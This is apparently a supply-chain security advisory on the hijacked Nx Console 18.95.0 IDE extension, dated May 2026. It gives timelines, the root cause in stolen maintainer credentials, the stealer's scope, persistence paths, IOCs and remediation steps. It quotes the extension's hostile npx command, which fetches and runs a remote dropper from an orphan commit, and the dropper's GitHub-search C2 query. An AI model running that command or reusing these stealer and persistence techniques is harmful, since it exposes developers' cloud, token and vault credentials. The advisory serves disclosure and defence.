Feed
CriticalPublished 18 May 2026Updated 20 May 20261 package · 1 version

Nx Console (nrwl.angular-console) 18.95.0 hijacked via TanStack-stolen GitHub creds

Summary

A malicious Nx Console v18.95.0 (publisher nrwl, ~2.2M installs across VS Code, Cursor, and JetBrains) shipped to both the VS Code Marketplace and Open VSX on 2026-05-18, live for ~18–36 minutes. Every workspace open fetched a 498KB Mini Shai-Hulud stage-2 dropper from an orphan commit in nrwl/nx. Nx telemetry estimates ~6,000 users received the build. Root cause: the May 11 TanStack compromise leaked one Nx Console maintainer's GitHub CLI credentials. Tracked as GHSA-c9j4-9m59-847w / CVE-2026-48027.

maintainer-takeovercredential-theftci-cd-compromisecdn-supply-chainobfuscation
Detected by
Nrwl · Socket · StepSecurity
Also known as
Nx Console 18.95.0
Ecosystems
Open VSX
Packages tracked
1

What happened

On 2026-05-18 the nrwl.angular-console IDE extension (Nx Console, ~2.2M installs across VS Code, Cursor, and JetBrains) was published as 18.95.0 to both the Microsoft VS Code Marketplace (live 12:30–12:48 UTC, ~18 min exposure) and Open VSX (live 12:33–13:09 UTC, ~36 min exposure). Despite the short windows, Nx team analytics estimate ~6,000 users actually received the malicious build — far higher than the 28–41 the marketplace counters showed at takedown, because the marketplace caches recent installs.

The root cause was not a direct credential leak on Nx Console itself. The TanStack burst on 2026-05-11 (npm-2026-05-shai-hulud-tanstack) exfiltrated GitHub CLI credentials from at least one Nx Console maintainer's laptop. The attacker used those credentials to run workflows on nrwl/nx-console as a legitimate contributor and to publish the malicious extension build.

The extension's main.js contains a hardcoded commit SHA 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 — an orphan / dangling commit in nrwl/nx, authored as @ZackDeRose, unsigned, dated 2026-05-18T03:18:03Z, with the message "Don't delete this commit before 24 hours or wiper activates". On every workspace open, the extension runs npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2, dragging in a 498KB obfuscated dropper disguised as a package named nx-next (PBKDF2+SHA-256 runtime string decryption).

  • Stealer scope: HashiCorp Vault tokens, K8s + AWS IAM credentials, npm tokens + OIDC tokens, AWS IMDS metadata + Secrets Manager + SSM parameters, GitHub tokens + Actions secrets, 1Password CLI vault contents, filesystem private keys, connection strings, and cloud provider credentials.
  • Exfiltration over HTTPS plus GitHub API as a dead-drop: it polls api.github.com/search/commits?q=firedalazer for tasking.
  • macOS persistence: a Python backdoor at ~/.local/share/kitty/cat.py plus a LaunchAgent at ~/Library/LaunchAgents/com.user.kitty-monitor.plist.
  • Linux: a sudoers escalation attempt.
  • Activation does NOT require install hooks — workspace open is enough; only avoiding 18.95.0 mitigates.

Disclosed via GHSA-c9j4-9m59-847w and tracked as CVE-2026-48027. Last clean release is 18.94.0; the fix lands in 18.100.0.

Affected packages (1)

  • Open VSXnrwl.angular-console
    18.95.0

Impact

  • Cloud credential theft: AWS (IMDS + Secrets Manager + SSM), GCP, Azure
  • Vault tokens, Kubernetes service-account tokens, kubeconfig
  • npm tokens + OIDC, GitHub PATs + Actions secrets — feeds the next worm hop
  • 1Password CLI vault contents and on-disk private keys
  • macOS persistence via LaunchAgent (com.user.kitty-monitor.plist) + Python backdoor (~/.local/share/kitty/cat.py)
  • Linux sudoers escalation attempt
  • GitHub API polling (search/commits?q=firedalazer) as resilient C2
  • Workspace activation fires WITHOUT install hooks — --ignore-scripts does NOT mitigate; only avoiding 18.95.0 does

What to do

  1. 1Pin nrwl.angular-console to <= 18.94.0 or upgrade to >= 18.100.0 everywhere. Refuse 18.95.0 in any extension allowlist
  2. 2On any developer machine that opened any workspace with Nx Console between 2026-05-18T12:30Z and 2026-05-18T13:09Z (across either marketplace): treat the host as fully compromised. Rotate npm/GitHub/CI tokens, AWS/GCP/Azure keys, Vault, K8s tokens, 1Password vault, SSH keys
  3. 3Hunt for IOC files on macOS: ~/.local/share/kitty/cat.py, ~/Library/LaunchAgents/com.user.kitty-monitor.plist, /var/tmp/.gh_update_state, /tmp/kitty-*. On Linux/macOS: any process running cat.py or with env var __DAEMONIZED=1
  4. 4Block egress to api.github.com search calls with query firedalazer; alert on outbound HTTPS to GitHub API from extension host processes
  5. 5Verify your installed extensions are NOT pulling commit 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 from nrwl/nx — that commit must be considered hostile even after marketplace removal
  6. 6Audit GitHub Actions workflow runs in nrwl/nx-console and nrwl/nx between 2026-05-17 and 2026-05-19 for unexpected pushes by previously-unknown contributors

References

openvsx-2026-05-18-nx-console-nrwl-angular-console